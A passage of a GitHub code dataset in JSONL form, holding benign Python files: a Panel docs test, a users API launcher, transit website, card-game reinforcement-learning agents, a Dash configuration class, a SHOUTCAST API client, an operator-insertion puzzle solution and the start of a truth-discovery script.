doc_files]\n)\ndef test_markdown_codeblocks(file, tmp_path):\n from markdown_it import MarkdownIt\n\n exceptions = (\"await\", \"pn.serve\", \"django\", \"raise\", \"display(\")\n\n md_ast = MarkdownIt().parse(file.read_text(encoding=\"utf-8\"))\n lines = \"\"\n for n in md_ast:\n if n.tag == \"code\" and n.info is not None:\n if \"pyodide\" in n.info.lower():\n if \">>>\" not in n.content:\n lines += n.content\n if not lines:\n return\n\n ast.parse(lines)\n\n if any(w in lines for w in exceptions):\n return\n\n mod = tmp_path / 
f'{file.stem}.py'\n\n    with open(mod, 'w', encoding='utf-8') as f:\n        f.writelines(lines)\n\n    runpy.run_path(mod)\n","repo_name":"holoviz/panel","sub_path":"panel/tests/test_docs.py","file_name":"test_docs.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":3266,"dataset":"github-code","pt":"3"} +{"seq_id":"47354650278","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Sarfraz Kapasi'\n__license__ = 'GPL-3'\n\n# standard\nimport os\nimport json\nimport logging\nimport argparse\n# custom\nfrom net.shksystem.common.utils import init_logger\nfrom net.shksystem.web.users.api import run_api\n\n# Globals\n# =============================================================================\n\nlogger = logging.getLogger(__name__)\n\n# Main\n# =============================================================================\n\ndef main():\n    ## arguments\n    parser = argparse.ArgumentParser(description='users api executable')\n\n    parser.add_argument(\n        '-p',\n        '--port',\n        help='port to listen on',\n        type=int,\n        default=8080\n    )\n    parser.add_argument(\n        '-l',\n        '--logfile',\n        help='path to log file',\n        default='users.out'\n    )\n    parser.add_argument(\n        '-v',\n        '--verbosity',\n        help='DEBUG switch',\n        action='store_true'\n    )\n    parser.add_argument(\n        '-d',\n        '--db-url',\n        help='database url',\n        default='sqlite:///users.db'\n    )\n    parser.add_argument(\n        '-b',\n        '--postgres-backend',\n        help='postgresql backend to use',\n        default='psycopg2'\n    )\n    args = parser.parse_args()\n\n\n    ## logging\n    if args.verbosity:\n        logger = init_logger(args.logfile, logging.DEBUG)\n    else:\n        logger = init_logger(args.logfile, logging.ERROR)\n\n    database_url = args.db_url\n    if database_url.startswith('postgresql'):\n        database_url = database_url.replace('postgresql',\n                'postgresql+{0}'.format(args.postgres_backend,))\n\n    run_api(database_url, port=args.port, debug=args.verbosity)\n\nif __name__ == '__main__':\n    main()\n\n#\n","repo_name":"sarfraz0/shk-users","sub_path":"users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28811385521","text":"'''\nCreated on 6 Oct 2016\n\n@author: fressi\n'''\n\nimport glob\nimport json\nimport logging\nimport os\n\nimport jinja2\nimport yaml\n\nimport transit_www\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass Model(object):\n    \"\"\"Data model for HTML file builder.\"\"\"\n\n    @classmethod\n    def from_yaml(cls, yaml_name):\n        \"\"\"Load configuration from YAML file.\"\"\"\n        loader = jinja2.PackageLoader(\n            package_name=transit_www.__name__, package_path='')\n        env = jinja2.Environment(loader=loader)\n        yaml_text = env.get_template(yaml_name).render()\n        return cls(env=env, conf=yaml.safe_load(yaml_text))  # safe_load: yaml.load without a Loader is rejected by modern PyYAML\n\n    def __init__(self, env, conf):\n        \"\"\"It creates the model given jinja environment and configuration.\"\"\"\n        self._env = env\n        self._conf = conf\n        self._text_files = {}\n\n    @property\n    def google_api_keys(self):\n        \"\"\"It gets the Google Maps API keys from the configuration file.\"\"\"\n\n        return self._conf['google']['api-keys']\n\n    def get_text_file(self, file_name, **variables):\n        \"\"\"It loads a template, substitutes variables and returns the resulting file.\"\"\"\n\n        variables['transit'] = json.dumps(self._conf['transit'])\n        variables['feed'] = json.dumps(self._conf['feed'])\n        text_file = self._text_files.get(file_name)\n        if text_file is None:\n            text_file = self._env.get_template(file_name).render(**variables)\n            
self._text_files[file_name] = text_file\n        return text_file\n\n    def get_text_files(self, file_names, **variables):\n        \"\"\"It loads and renders template files matching given wildcards.\"\"\"\n\n        base_dir = os.path.dirname(transit_www.__file__)\n        parts = tuple(file_names.split('/'))\n        full_name = os.path.join(base_dir, *parts)\n        for file_name in glob.glob(full_name):\n            template_name = os.path.relpath(file_name, base_dir)\n            yield self.get_text_file(template_name, **variables)\n\n    def get_data_file(self, file_name):\n        \"\"\"It reads and returns the raw bytes of a data file.\"\"\"\n        base_dir = os.path.join(os.path.dirname(transit_www.__file__), 'html')\n        parts = tuple(file_name.split('/'))\n        full_name = os.path.join(base_dir, *parts)\n        with open(full_name, \"rb\") as stream:\n            return stream.read()\n\n    def iter_feeds(self):\n        target_dir = self._conf['feed'][0]['dir']\n        rule_dir = self._conf['feed'][0]['url']\n        for directory, _, file_names in os.walk(target_dir):\n            for name in file_names:\n                _, ext = os.path.splitext(name)\n                if ext == '.gz':\n                    feed_path = os.path.join(\n                        os.path.relpath(directory, target_dir), name)\n                    rule = '/'.join([\"\", rule_dir, feed_path])\n                    target_file = os.path.join(target_dir, feed_path)\n                    yield Feed(rule, target_file)\n\n\nclass Feed(object):\n\n    def __init__(self, rule, target_file):\n        self.rule = rule\n        self.target_file = target_file\n\n    @property\n    def endpoint(self):\n        return 'feed' + str(id(self))\n\n    def view_func(self):\n        with open(self.target_file, \"rb\") as stream:\n            return stream.read()\n","repo_name":"pubtransit/pubtransit","sub_path":"transit_www/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"70780178321","text":"import time\nimport numpy as np\nimport pandas as pd\nimport random as rd\nimport matplotlib.pyplot as plt\nfrom enum import Enum\nfrom random import shuffle as rshuffle\nimport tensorflow.compat.v2 as tf\nfrom tensorflow import keras\nimport tensorflow as tf1\n\nimport deal_cards as dc\nimport cards_env as ce\nimport discard_q_net_keras_3 as q_net\n\n#\ndef best_6_cards(y_true, y_pred):\n    oindex = tf1.argsort(y_pred, direction='DESCENDING', axis=-1)\n    top_1 = tf1.math.top_k(oindex, 1)\n    return top_1 #it is NOT a list. give up\n\n\nclass RandomAgent:\n    def __init__(self):\n        self.decide_his={}\n        return\n    \n    def decide(self, state2):\n        oindex = np.where(state2 > 0)[0]\n        discard_candidates_len = len(oindex)\n\n        action_index = np.random.choice(discard_candidates_len)\n        action = oindex[action_index]\n        \n        if action not in self.decide_his.keys():\n            self.decide_his[action] = 1\n        else:\n            self.decide_his[action] += 1\n\n        behavior = 1. / discard_candidates_len # why ? A: the probability is 1/n = b(A|S); this importance weight is the key to the off-policy method\n        return action, behavior\n\n\nclass DiscardAgent_net1_PI(q_net.DiscardAgent_net6_base): #1 step\n    #input = onehot*54; output=54*p()\n    def __init__(self, gamma=0.0):\n        self.gamma = gamma\n\n        input_size=54\n        hidden_layers = [[256, 0.2], [64, 0.2]]\n        output_size=54\n        activation=tf.nn.relu\n        loss=tf.losses.categorical_crossentropy # tf.losses.mse\n        output_activation=tf.nn.softmax\n        learning_rate = 0.001\n        self.policy_net = self.build_network(input_size, hidden_layers, output_size,\n                                             activation, loss, output_activation, learning_rate)\n\n        input_size=54\n        hidden_layers = [[128, 0.2]]\n        output_size=1\n        activation=tf.nn.relu\n        loss=tf.losses.mse\n        output_activation=None\n        learning_rate = 0.001\n        self.v_net = self.build_network(input_size, hidden_layers, output_size,\n                                        activation, loss, output_activation, learning_rate)\n        return\n    \n    def decide(self, state2):\n        oindex = np.where(state2 > 0)[0]\n        state = state2[np.newaxis] #full_cards_onehot_like, batch=1\n        actions0 = self.policy_net.predict(state).reshape(-1) #oindex(54,), action0(1,54)->(54)\n        actions1 = actions0[oindex]\n        actions_index0 = np.argsort(-actions1)\n        actions_index = actions_index0[:6]\n        actions = oindex[actions_index]\n        return actions\n\n    def pre_learn(self, state2, action, reward, done, best_discards_oindex):\n        #loss = mse MUST\n        discard_possibility = np.zeros(54)\n\n        discard_possibility[best_discards_oindex] = 1/6\n        y = discard_possibility[np.newaxis]\n        \n        state = state2[np.newaxis] #full_cards_onehot_like, batch=1\n        self.policy_net.fit(state, y, verbose=0)\n        return\n\n    def learn(self, state2, action, reward, done, best_discards_oindex):\n        discard_possibility = np.zeros(54)\n\n        discard_possibility[best_discards_oindex] = 1/6\n        G = reward # the return\n        gamma = self.gamma # 1 round\n        y = gamma * G * discard_possibility\n        y = y[np.newaxis]\n        \n        state = state2[np.newaxis] #full_cards_onehot_like, batch=1\n        self.policy_net.fit(state, y, verbose=0)\n        return\n\n\nclass DiscardAgent_net6_PI(q_net.DiscardAgent_net6_base): #6 steps\n    #input = onehot*54; output=54*p()\n    def __init__(self, hidden_layers_pi, hidden_layers_v, learning_rate, filename_pi, filename_v, reload=False, \n                 gamma=0.2, loss1=tf.losses.categorical_crossentropy, epsilon=0.0, flash_t=False ):\n        super().__init__(learning_rate, epsilon=epsilon, gamma=gamma, flash_t=flash_t)\n        \n        self.filename_pi = filename_pi\n        self.filename_v = filename_v\n\n        if ( reload == True ):\n            self.policy_net = self.load_model(filename_pi, loss1)\n            self.v_net = self.load_model(filename_v)\n            self.policy_net.summary()\n            self.v_net.summary()\n        else:\n            input_size=54\n            #hidden_layers = [[256, 0.2], [64, 0.2]]\n            #hidden_layers = [[4096, 0.2], [512, 0.2], [128, 0.2]]\n            hidden_layers = hidden_layers_pi\n            output_size=54\n            activation=tf.nn.relu\n            loss=loss1 #tf.losses.categorical_crossentropy # tf.losses.mse\n            output_activation=tf.nn.softmax\n            learning_rate = learning_rate #0.00001\n            self.policy_net = self.build_network(input_size, hidden_layers, output_size,\n                                                 activation, loss, output_activation, learning_rate)\n            \n            input_size=54\n            #hidden_layers = [[1024, 0.2], [128, 0.2]]\n            hidden_layers = hidden_layers_v\n            output_size=1\n            activation=tf.nn.relu\n            loss=tf.losses.mse\n            output_activation=None\n            learning_rate = learning_rate #0.00001\n            self.v_net = self.build_network(input_size, hidden_layers, output_size,\n                                            activation, loss, output_activation, learning_rate)\n        return\n\n    def decide(self, state2, train=True):\n        b = 1 #dummy for behavior\n        if np.random.rand() < self.epsilon and train==True:\n            #TBD:
this epsilon-greedy branch behaves off-policy; epsilon should not be used in an on-policy algorithm !!\n            oindex = np.where(state2 > 0)[0] # '!=' => '>' due to -1, 10, 100\n            q_max_index = np.random.choice(len(oindex))\n            q_max_oindex = oindex[q_max_index]\n            #b = 1.0/len(oindex) #in-policy never use it (b)\n        else:\n            q_max_oindex, action0_index, action0 = super().decide_6(self.policy_net, state2)\n        \n        if True == train :\n            return q_max_oindex, b\n        else:\n            return q_max_oindex, b, action0_index, action0\n    \n\n    def decide_onego(self, state2): #collect 6 cards once. state2 size MUST be 18\n        q_max_oindex, action0_index, action0 = super().decide_1(self.policy_net, state2)\n        return q_max_oindex, action0_index, action0\n\n    def pre_learn_G(self, trajectory0): #G support batch=1 only\n        #manual reward\n        Gs = []\n        Gs_gamma = []\n        G = 0\n        trajectory = np.array(trajectory0)\n        state2s = trajectory[:,0].tolist()\n        state2s = np.array(state2s)\n        \n        vs = self.v_net.predict(state2s)\n        vs = vs.reshape(-1)\n        T = trajectory.shape[0] #6\n        \n        reward = 0\n        for t, step_list in enumerate(reversed(trajectory0)): #[::-1]: 0-5\n            state2, action, reward0, behavior = step_list[0], step_list[1], step_list[2], step_list[5]\n\n            #if t == 0: #last R=1. have to use the 1 step reward rather than 6 step reward\n            #    reward = reward0 #extend the last R to all 6 steps. \n            reward = reward0\n            cards_counter = state2.sum()\n            G = reward + self.gamma * G\n            G_gamma = G * self.gamma **(T-t-1)\n            vs[T-t-1] = vs[T-t-1] * self.gamma **(T-t-1)\n            Gs.insert(0, G)\n            G_gamma -= vs[T-t-1] #baseline\n            G_gamma /= behavior #cum_behavior # **t: diff to ch7.py\n            Gs_gamma.insert(0, G_gamma)\n        \n        Gs = np.array(Gs)[:, np.newaxis]\n        Gs_gamma = np.array(Gs_gamma)[:, np.newaxis]\n        actions = trajectory[:,1].tolist()\n        \n        discard_possibility0 = np.eye(54)[actions]\n        discard_possibility = discard_possibility0 * Gs_gamma\n        \n        #print(Gs.shape, state2s.shape, discard_possibility.shape)\n        his = self.policy_net.fit(state2s, discard_possibility, verbose=0)\n        self.v_net.fit(state2s, Gs, verbose=0)\n        return his\n\n    def save_models(self):\n        super().save_model(self.policy_net, self.filename_pi)\n        super().save_model(self.v_net, self.filename_v)\n\n\nclass OffPolicyDiscardAgent_net6_PI(DiscardAgent_net6_PI): #6 steps\n    def __init__(self, hidden_layers_pi, hidden_layers_v, learning_rate, filename_pi, filename_v, \n                 reload=False, gamma=0.2):\n        self.agent_b = RandomAgent()\n        \n        def my_loss(y_true, y_pred): #YDL: the loss is just a dot product; take its gradient w.r.t. theta \n            # y_true = y = (df['psi'] / df['behavior']) = (gamma^t * Gt) / b(A|S)\n            # y_pred = pi(A|S,theta)\n            # - y_true * y_pred is exactly the theta update rule from ch7.3; reusing tf's loss machinery for it is a neat trick!!!\n            # gradient of loss(theta) w.r.t. theta = -(gamma^t * Gt) / b(A|S) * delta(pi(A|S,theta))\n            loss_b = -tf.reduce_sum(y_true * y_pred, axis=-1)\n            return loss_b\n        \n        super().__init__(hidden_layers_pi, hidden_layers_v, learning_rate, filename_pi, filename_v, \n                 reload=reload, gamma=gamma, loss1=my_loss)\n        \n    def decide(self, state2, train=True):\n        b = 1\n        if True == train :\n            action, b = self.agent_b.decide(state2)\n        else:\n            action, _, action0_index, action0 = super().decide(state2, train=False)\n\n        if True == train :\n            return action, b\n        else:\n            return action, b, action0_index, action0\n    \n    \n","repo_name":"qch1976/cards40","sub_path":"discard_pi_net_keras_3.py","file_name":"discard_pi_net_keras_3.py","file_ext":"py","file_size_in_byte":9267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25278409554","text":"#!/usr/bin/python\n#\n# 2023 Ensomniac Ryan Martin, ryan@ensomniac.com\n#                Andrew Stet, stetandrew@gmail.com\n\nimport os\nimport sys\n\nfrom Dash import LocalStorage\nfrom Dash.Properties.SharedProperty import SharedProperty\n\n\nclass Configuration:\n    _dash_context: dict\n\n    def __init__(self, dash_context_asset_path, config_type):\n        self.asset_path = dash_context_asset_path\n        self.config_type = config_type  # Ex: vibe / billing_status / component\n        self.shared_property_objects = []\n\n    @property\n    def DashContext(self):\n        if not hasattr(self, \"_dash_context\"):\n            from Dash import PackageContext as Context\n\n            self._dash_context = Context.Get(self.asset_path)\n\n        return self._dash_context\n\n    @property\n    def StorePath(self):\n        if self.asset_path == \"authentic\":\n            # TODO: Authentic will need to be updated to the new format at some point\n            return f\"sb_config_{self.config_type}\"\n\n        else:\n            # New format\n            return os.path.join(\"config_properties\", self.config_type)\n\n    @property\n    def SharedProperties(self):\n        shared_properties = []\n\n        for sp in self.shared_property_objects:\n            shared_properties.append(sp.ToDict())\n\n        return shared_properties\n\n    def AddProperty(\n        self,\n        display_name,\n        key,\n        prop_type,\n        min_value=None,\n        max_value=None,\n        default_value=None,\n        property_set_key=None\n    ):\n        self.shared_property_objects.append(SharedProperty(\n            display_name=display_name,\n            key=key,\n            prop_type=prop_type,\n            min_value=min_value,\n            max_value=max_value,\n            default_value=default_value,\n            property_set_key=property_set_key,\n        ))\n\n    def CreateConfig(self):\n        from Dash.Properties import MergeDefaultValues\n\n        additional_data = MergeDefaultValues(\n            {\"config_type\": self.config_type},\n            self.SharedProperties,\n            self\n        )\n\n        created_config = LocalStorage.New(\n            dash_context=self.DashContext,\n            store_path=self.StorePath,\n            additional_data=additional_data\n        )\n\n        response = self.GetAll()\n        response[\"config_type\"] = self.config_type\n        response[\"new_id\"] = created_config[\"id\"]\n\n        return response\n\n    def GetAll(self):\n        response = LocalStorage.GetAll(\n            dash_context=self.DashContext,\n            store_path=self.StorePath,\n            # sort_by_key=\"combo_id\"\n            sort_by_key=\"display_name\"\n        )\n\n        response[\"shared_properties\"] = []\n\n        for sp in self.shared_property_objects:\n            response[\"shared_properties\"].append(sp.ToDict())\n\n        return response\n\n    def SetConfigProperty(self, obj_id, key, value):\n        if key == \"display_name\":\n            self.check_if_property_exists(key, value)\n            self.set_combo_id(obj_id, value)\n\n        return LocalStorage.SetProperty(\n            dash_context=self.DashContext,\n            store_path=self.StorePath,\n            obj_id=obj_id,\n            key=key,\n            
value=value\n )\n\n def Delete(self, obj_id):\n delete_result = LocalStorage.Delete(\n dash_context=self.DashContext,\n store_path=self.StorePath,\n obj_id=obj_id\n )\n\n result = self.GetAll()\n\n result[\"delete_result\"] = delete_result\n result[\"config_type\"] = self.config_type\n\n return result\n\n def check_if_property_exists(self, key, value):\n all_properties = self.GetAll()[\"data\"]\n\n for property_id in all_properties:\n property_data = all_properties[property_id]\n\n if property_data.get(key) != value:\n continue\n\n from Dash.Utils import ClientAlert\n\n raise ClientAlert(f\"'{value}' already exists, please use a different '{key}'\")\n\n def set_combo_id(self, obj_id, value):\n from Dash.Utils import GetAssetPath\n\n LocalStorage.SetProperty(\n dash_context=self.DashContext,\n store_path=self.StorePath,\n obj_id=obj_id,\n key=\"combo_id\",\n value=GetAssetPath(value)\n )\n","repo_name":"ensomniac/dash","sub_path":"pydash/Dash/Properties/Configuration.py","file_name":"Configuration.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74321124242","text":"\"\"\"\r\nCompile destinations.\r\n\r\nCollates destinations based on configuration settings from OpenStreetMap\r\ndata.\r\n\"\"\"\r\n\r\nimport time\r\n\r\nimport psycopg2\r\n\r\n# Set up project and region parameters for GHSCIC analyses\r\nfrom _project_setup import *\r\nfrom script_running_log import script_running_log\r\n\r\n\r\ndef main():\r\n # simple timer for log file\r\n start = time.time()\r\n script = os.path.basename(sys.argv[0])\r\n\r\n # OUTPUT PROCESS\r\n task = 'Compile study region destinations'\r\n print(\r\n 'Commencing task: {} at {}'.format(\r\n task, time.strftime('%Y%m%d-%H%M%S'),\r\n ),\r\n )\r\n # list destinations which have OpenStreetMap specified as their data source\r\n df_osm_dest_unique = df_osm_dest[\r\n ['dest_name', 'dest_full_name', 'domain']\r\n ].drop_duplicates(subset=['dest_name'])\r\n df_osm_dest['pre-condition'] = df_osm_dest['pre-condition'].replace(\r\n 'NULL', 'OR',\r\n )\r\n # dest_osm_list = [x.encode('utf') for x in df_osm_dest_unique['dest_name']]\r\n # Create destination type table in sql database\r\n # connect to the PostgreSQL server\r\n conn = psycopg2.connect(dbname=db, user=db_user, password=db_pwd)\r\n curs = conn.cursor()\r\n\r\n # Create empty combined destination table\r\n create_dest_type_table = \"\"\"\r\n DROP TABLE IF EXISTS dest_type;\r\n CREATE TABLE dest_type\r\n (\r\n dest_name varchar PRIMARY KEY,\r\n dest_name_full varchar,\r\n domain varchar NOT NULL,\r\n count integer\r\n );\r\n \"\"\"\r\n curs.execute(create_dest_type_table)\r\n conn.commit()\r\n\r\n create_destinations_table = \"\"\"\r\n DROP TABLE IF EXISTS destinations CASCADE;\r\n CREATE TABLE destinations\r\n (\r\n dest_oid SERIAL PRIMARY KEY,\r\n osm_id varchar,\r\n dest_name varchar NOT NULL,\r\n dest_name_full varchar NOT NULL,\r\n geom geometry(POINT)\r\n );\r\n \"\"\"\r\n curs.execute(create_destinations_table)\r\n conn.commit()\r\n\r\n print('\\nImporting destinations...')\r\n print(\r\n '\\n{dest:50} {dest_count}'.format(\r\n dest='Destination', dest_count='Import count',\r\n ),\r\n )\r\n # for dest in dest_osm_list:\r\n for row in df_osm_dest_unique.itertuples():\r\n dest = getattr(row, 'dest_name')\r\n dest_name_full = getattr(row, 'dest_full_name')\r\n domain = getattr(row, 'domain')\r\n dest_condition = []\r\n for condition in ['AND', 'OR', 'NOT']:\r\n # for condition in 
df_osm_dest[df_osm_dest['dest_name']==dest]['pre-condition'].unique():\r\n            # print(condition)\r\n            if condition == 'AND':\r\n                clause = ' AND '.join(\r\n                    df_osm_dest[\r\n                        (df_osm_dest['dest_name'] == dest)\r\n                        & (df_osm_dest['pre-condition'] == 'AND')\r\n                    ]\r\n                    .apply(\r\n                        lambda x: f'{x.key} IS NOT NULL'\r\n                        if x.value == 'NULL'\r\n                        else f\"{x.key} = '{x.value}'\",\r\n                        axis=1,\r\n                    )\r\n                    .values.tolist(),\r\n                )\r\n                dest_condition.append(clause)\r\n            if condition == 'OR':\r\n                clause = ' OR '.join(\r\n                    df_osm_dest[\r\n                        (df_osm_dest['dest_name'] == dest)\r\n                        & (df_osm_dest['pre-condition'] == 'OR')\r\n                    ]\r\n                    .apply(\r\n                        lambda x: f'{x.key} IS NOT NULL'\r\n                        if x.value == 'NULL'\r\n                        else f\"{x.key} = '{x.value}'\",\r\n                        axis=1,\r\n                    )\r\n                    .values.tolist(),\r\n                )\r\n                dest_condition.append(clause)\r\n            if condition == 'NOT':  # was '!=', which appended the NOT clause on the wrong iterations\r\n                clause = ' AND '.join(\r\n                    df_osm_dest[\r\n                        (df_osm_dest['dest_name'] == dest)\r\n                        & (df_osm_dest['pre-condition'] == 'NOT')\r\n                    ]\r\n                    .apply(\r\n                        lambda x: f'{x.key} IS NOT NULL'\r\n                        if x.value == 'NULL'\r\n                        else f\"{x.key} != '{x.value}' OR access IS NULL\",\r\n                        axis=1,\r\n                    )\r\n                    .values.tolist(),\r\n                )\r\n                dest_condition.append(clause)\r\n        dest_condition = [x for x in dest_condition if x != '']\r\n        # print(len(dest_condition))\r\n        if len(dest_condition) == 1:\r\n            dest_condition = dest_condition[0]\r\n        else:\r\n            dest_condition = '({})'.format(') AND ('.join(dest_condition))\r\n        print(dest_condition)\r\n        combine__point_destinations = f\"\"\"\r\n        INSERT INTO destinations (osm_id, dest_name,dest_name_full,geom)\r\n        SELECT osm_id, '{dest}','{dest_name_full}', d.geom\r\n        FROM {osm_prefix}_point d\r\n        WHERE {dest_condition};\r\n        \"\"\"\r\n        curs.execute(combine__point_destinations)\r\n        conn.commit()\r\n\r\n        # get point dest count in order to set correct auto-increment start value for polygon dest OIDs\r\n        curs.execute(\r\n            f\"\"\"SELECT count(*) FROM destinations WHERE dest_name = '{dest}';\"\"\",\r\n        )\r\n        dest_count = int(list(curs)[0][0])\r\n\r\n        combine_poly_destinations = f\"\"\"\r\n        INSERT INTO destinations (osm_id, dest_name,dest_name_full,geom)\r\n        SELECT osm_id, '{dest}','{dest_name_full}', ST_Centroid(d.geom)\r\n        FROM {osm_prefix}_polygon d\r\n        WHERE {dest_condition};\r\n        \"\"\"\r\n        curs.execute(combine_poly_destinations)\r\n        conn.commit()\r\n\r\n        curs.execute(\r\n            f\"\"\"SELECT count(*) FROM destinations WHERE dest_name = '{dest}';\"\"\",\r\n        )\r\n        dest_count = int(list(curs)[0][0])\r\n\r\n        if dest_count > 0:\r\n            summarise_dest_type = f\"\"\"\r\n            INSERT INTO dest_type (dest_name,dest_name_full,domain,count)\r\n            SELECT '{dest}',\r\n                   '{dest_name_full}',\r\n                   '{domain}',\r\n                   {dest_count}\r\n            \"\"\"\r\n            curs.execute(summarise_dest_type)\r\n            conn.commit()\r\n        # print destination name and tally which have been imported\r\n        print(f'\\n{dest:50} {dest_count:=10d}')\r\n        print(f'({dest_condition})')\r\n\r\n    if custom_destinations['file'] is not None:\r\n        import pandas as pd\r\n        from sqlalchemy import create_engine, inspect\r\n\r\n        engine = create_engine(\r\n            f'postgresql://{db_user}:{db_pwd}@{db_host}/{db}',\r\n        )\r\n        db_contents = inspect(engine)\r\n        df = pd.read_csv(f'{region_dir}/{custom_destinations[\"file\"]}')\r\n        df.to_sql('custom_destinations', engine, if_exists='replace')\r\n        sql = f\"\"\"\r\n        INSERT INTO destinations (dest_name,dest_name_full,geom)\r\n        SELECT {custom_destinations[\"dest_name\"]}::text dest_name,\r\n               {custom_destinations[\"dest_name_full\"]}::text dest_name_full,\r\n               ST_Transform(ST_SetSRID(ST_Point(\r\n                    \"{custom_destinations[\"lon\"]}\"::float,\r\n                    \"{custom_destinations[\"lat\"]}\"::float),\r\n                    {custom_destinations[\"epsg\"]}),\r\n                    {crs['srid']}\r\n                ) geom\r\n            FROM custom_destinations;\r\n        \"\"\"\r\n        curs.execute(sql)\r\n        conn.commit()\r\n\r\n    create_destinations_indices = \"\"\"\r\n    CREATE INDEX destinations_dest_name_idx ON destinations (dest_name);\r\n    CREATE INDEX destinations_geom_geom_idx ON destinations USING GIST (geom);\r\n    \"\"\"\r\n    curs.execute(create_destinations_indices)\r\n    conn.commit()\r\n    curs.execute(grant_query)\r\n\r\n    # output to completion log\r\n    script_running_log(script, task, start, codename)\r\n    conn.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"Aniketkn/ineuron.ai","sub_path":"process/subprocesses/_05_compile_destinations.py","file_name":"_05_compile_destinations.py","file_ext":"py","file_size_in_byte":7921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70438954962","text":"# 14888\n\n# +, -, *, //\nfrom itertools import permutations\nimport copy\nimport sys\ninput()\nminVal = 1000000000\nmaxVal = -1000000000\ndataList = list(map(int, sys.stdin.readline().split()))\nmethodList = list(map(int, sys.stdin.readline().split()))\nmethodStr = \"\"\nmethodStr += \"+\" * methodList[0]\nmethodStr += \"-\" * methodList[1]\nmethodStr += \"*\" * methodList[2]\nmethodStr += \"/\" * methodList[3]\n\nfor operation in set(permutations(methodStr, len(methodStr))):\n    # evaluation logic: apply the chosen operator sequence left to right\n    tempList = copy.deepcopy(dataList)\n    calVal = tempList.pop(0)\n    for idx, op in enumerate(operation):\n        if op == \"+\":\n            calVal += tempList[idx]\n        elif op == \"-\":\n            calVal -= tempList[idx]\n        elif op == \"*\":\n            calVal *= tempList[idx]\n        else:\n            if calVal < 0:\n                calVal = -(calVal)\n                calVal //= tempList[idx]\n                calVal = -(calVal)\n            else:\n                calVal //= tempList[idx]\n    maxVal = max(maxVal, calVal)\n    minVal = min(minVal, calVal)\n\nprint(maxVal)\nprint(minVal)\n","repo_name":"tomxoghks789/pyAlgo","sub_path":"Brute force/연산자 끼워넣기.py","file_name":"연산자 끼워넣기.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22764066391","text":"import xmltodict\nimport json\nfrom .models import Tunein\nfrom .utils import _init_session\nfrom .Exceptions import APIException\n\nbase_url = 'http://api.shoutcast.com'\ntunein_url = 'http://yp.shoutcast.com/{base}?id={id}'\n\ntuneins = [Tunein('/sbin/tunein-station.pls'), Tunein('/sbin/tunein-station.m3u'), Tunein('/sbin/tunein-station.xspf')]\n\n\ndef call_api_xml(endpoint, params=None, session=None):\n    session = _init_session(session)\n    request_url = \"{}{}\".format(base_url, endpoint)\n    response = session.get(request_url, params=params)\n    if response.status_code == 200:\n        response_as_dict = xmltodict.parse(response.content)\n        api_response = response_as_dict.get('response')\n\n        if api_response:\n            api_status_code = int(api_response.get('statusCode'))\n            message = \"statusText:{}, statusDetailText:{}\".format(\n                api_response.get('statusText'), api_response.get('statusDetailText')\n            )\n            raise APIException(message, code=api_status_code)\n\n        return response_as_dict\n    raise APIException(response.content, code=response.status_code)\n\n\ndef call_api_json(endpoint, params=None, session=None):\n    session = _init_session(session)\n    request_url = \"{}{}\".format(base_url, endpoint)\n    response = session.get(request_url, params=params)\n    if response.status_code == 200:\n        json_response = json.loads(response.content.decode('utf-8'))\n\n        api_response = 
json_response.get('response')\n api_status_code = int(api_response.get('statusCode'))\n\n if api_status_code != 200:\n message = \"statusText:{}, statusDetailText:{}\".format(\n api_response.get('statusText'), api_response.get('statusDetailText', '')\n )\n raise APIException(message, code=api_status_code)\n\n return json_response.get('response')['data']\n raise APIException(response.reason, code=response.status_code)\n\n\ndef call_api_tunein(station_id: int, session=None):\n session = _init_session(session)\n url = tunein_url.format(base=tuneins[2], id=station_id)\n response = session.get(url)\n if response.status_code == 200:\n api_response = xmltodict.parse(response.content.decode('utf-8'))\n return api_response\n raise APIException(response.reason, code=response.status_code)\n\n\ndef call_api_tunein_any(base: Tunein, station_id: int, session=None):\n session = _init_session(session)\n url = tunein_url.format(base=base, id=station_id)\n response = session.get(url)\n if response.status_code == 200:\n return response.content.decode('utf-8')\n raise APIException(response.reason, code=response.status_code)\n","repo_name":"eadwinCode/shoutcast_api","sub_path":"shoutcast_api/shoutcast_request.py","file_name":"shoutcast_request.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"25643657592","text":"import os\nimport time\nimport datetime\n\nMovie_fact_path = \"../DataToUse/movie/factDB_movie\"\nMovie_claim_path = \"../DataToUse/movie/claimDB_movie\"\n\nBook_fact_path = \"../DataToUse/book/factDB_book\"\nBook_claim_path = \"../DataToUse/book/claimDB_book\"\n\ntest_fact_path = \"../DataToUse/test/testDB_fact_movie\"\ntest_claim_path = \"../DataToUse/test/testDB_claim_movie\"\n\ndef MV(dataset, datasetPath, outputWritePath):\n def generate_fact_dict(factdict, dataWriteLine):\n dataSplit = dataWriteLine.split(\"\\t\")\n factdict[dataSplit[0]] = dict()\n factdict[dataSplit[0]][dataSplit[1]] = dataSplit[2] # BID, MID: Aurthor, Director\n\n def generate_claim_dict(claimdict, dataWriteLine):\n dataSplit = dataWriteLine.split(\"\\t\")\n if dataSplit[0] not in claimdict.keys():\n claimdict[dataSplit[0]] = dict()\n claimdict[dataSplit[0]][dataSplit[1]] = dataSplit[2]\n\n def generate_object_claim_dict(factDict, claimDict):\n object_claim_count_dict = dict()\n for key1 in claimDict.keys():\n for key2 in factDict[key1].keys():\n if key2 not in 